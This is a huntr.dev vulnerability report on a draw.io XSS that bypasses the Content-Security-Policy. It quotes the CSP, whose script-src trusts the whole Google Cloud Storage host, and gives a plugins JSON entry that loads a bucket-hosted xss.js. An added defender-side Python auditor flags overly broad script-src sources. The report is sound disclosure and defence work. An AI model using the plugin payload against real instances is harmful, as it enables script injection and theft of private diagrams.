huntr report 6CEA89D1-39DC-4023-82FA-821F566B841A by Kevin-mizu
History: Sep 05, 2022 - 9:16 a.m.

XSS with CSP bypass on WEB instances

2022-09-05 09:16:56
kevin-mizu
www.huntr.dev
Tags: xss, csp, drawio, web instances, google cloud bucket

EPSS: 0.001 (Percentile: 30.0%)

📝 Description

Drawio WEB instances allow https://storage.googleapis.com in the CSP script-src directive. By abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.

🕵️‍♂️ Proof of Concept

On the web application side, JavaScript execution is restricted by the following CSP:

...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...

Because the policy allows scripts to be loaded from https://storage.googleapis.com, which is the public URL prefix for Google Cloud Storage buckets, a script uploaded to any bucket can be loaded and executed in the page. The plugins entry below points the application at such a script:

{
  "plugins": [
    "https://storage.googleapis.com/bypass_csp/xss.js"
  ]
}

[Screenshot: xss_web.png]
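As an added defender-side example (not part of the original report or the draw.io project), the following Python audits a script-src directive for sources that hand script execution to third parties, which is exactly what the whole-host storage.googleapis.com entry quoted above does, and shows the path-scoped form that limits that host to one project-owned bucket. The public-upload host list and the bucket name are assumptions.

```python
import re

# Hosts that serve files uploaded by arbitrary third parties; allowing one as a whole in
# script-src lets any uploaded file run as script. Assumed, hand-picked list for this example.
PUBLIC_UPLOAD_HOSTS = {"storage.googleapis.com", "s3.amazonaws.com", "raw.githubusercontent.com"}

def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy value into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def split_source(src: str) -> tuple[str, str]:
    """Return (host, path) of a host-source: https://host:443/bucket/ -> ('host', '/bucket/')."""
    rest = re.sub(r"^[a-z][a-z0-9+.-]*://", "", src, flags=re.I)
    host, _, path = rest.partition("/")
    return host.split(":")[0].lower(), ("/" + path if path else "")

def audit_script_src(header: str) -> list[str]:
    """One finding per script-src source that widens script execution beyond app-owned code."""
    policy = parse_csp(header)
    sources = policy.get("script-src") or policy.get("default-src") or []
    findings = []
    for src in sources:
        if src in ("*", "'unsafe-inline'", "'unsafe-eval'"):
            findings.append(f"{src}: effectively disables script restrictions")
        elif src.startswith("'"):                      # 'self', 'nonce-...', 'sha256-...'
            continue
        elif re.fullmatch(r"[a-z][a-z0-9+.-]*:", src, re.I):
            findings.append(f"{src}: scheme source trusts every host on that scheme")
        else:
            host, path = split_source(src)
            if host.startswith("*."):
                findings.append(f"{src}: wildcard host, every subdomain is trusted")
            elif host in PUBLIC_UPLOAD_HOSTS and path in ("", "/"):
                # A path-scoped source (https://host/owned-bucket/) limits what can load,
                # though browsers drop the path check once a request has been redirected.
                findings.append(f"{src}: whole public upload host allowed, scope it to a path")
    return findings

# Constructed input: the script-src directive quoted in this report (remaining hashes trimmed).
CSP_FROM_REPORT = ("script-src https://www.dropbox.com https://api.trello.com 'self' "
                   "https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com "
                   "https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes='")
# Hardened variant: the bucket host scoped to one project-owned bucket path (assumed name).
CSP_HARDENED = CSP_FROM_REPORT.replace(
    "https://storage.googleapis.com ", "https://storage.googleapis.com/drawio-owned-bucket/ ")
```

Running audit_script_src over CSP_FROM_REPORT reports the whole-host storage.googleapis.com entry and the *.pusher.com wildcard; over CSP_HARDENED only the wildcard remains.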
